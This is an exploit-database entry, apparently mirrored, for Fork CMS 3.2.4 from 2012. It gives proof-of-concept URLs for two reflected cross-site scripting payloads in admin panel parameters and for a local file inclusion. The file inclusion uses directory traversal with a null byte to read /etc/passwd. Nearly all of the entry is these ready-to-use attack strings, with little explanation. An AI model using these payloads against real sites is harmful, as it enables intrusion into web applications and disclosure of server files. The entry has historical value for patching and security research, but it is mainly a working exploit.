[] NeoSense
E X P L O I T S
title author type platform port cve id

Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting

Author: Avram Marius
type: webapps
platform: php
port: 
date_added: 2012-02-12 
date_updated: 2012-02-12 
verified: 0 
codes: OSVDB-79274;OSVDB-79273;CVE-2012-1304;CVE-2012-1208;OSVDB-79272 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comforkcms-forkcms-3.2.4-0-g26b92cd.zip

##########################################################################################################################

#  Exploit Title: Fork CMS v.3.2.4  - Multiple Vulnerabilities

#  Script Page : http://www.fork-cms.com

#  Date: 11-02-2012

#  Author : RandomStorm  - http://www.randomstorm.com

#  Avram Marius Gabriel (d3v1l)

#  Tested on: Windows XP & Vista


##########################################################################################################################

#  Reflected Cross-Site Scripting (XSS) on Admin Panel

#  POC:

#  http://site.com/blog/settings?token=true&report=</script><script>alert(1)</script>

#  http://site.com/users/index?token=true&error=</script><script>alert(1)</script>

###########################################################################################################################

#  Local File Inclusion ( LFI )

#  POC:

#  http://site.com/frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en


##########################################################################################################################

# About: Fork CMS is dedicated to creating a user friendly environment to build,monitor and update your website.

###########################################################################################################################
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.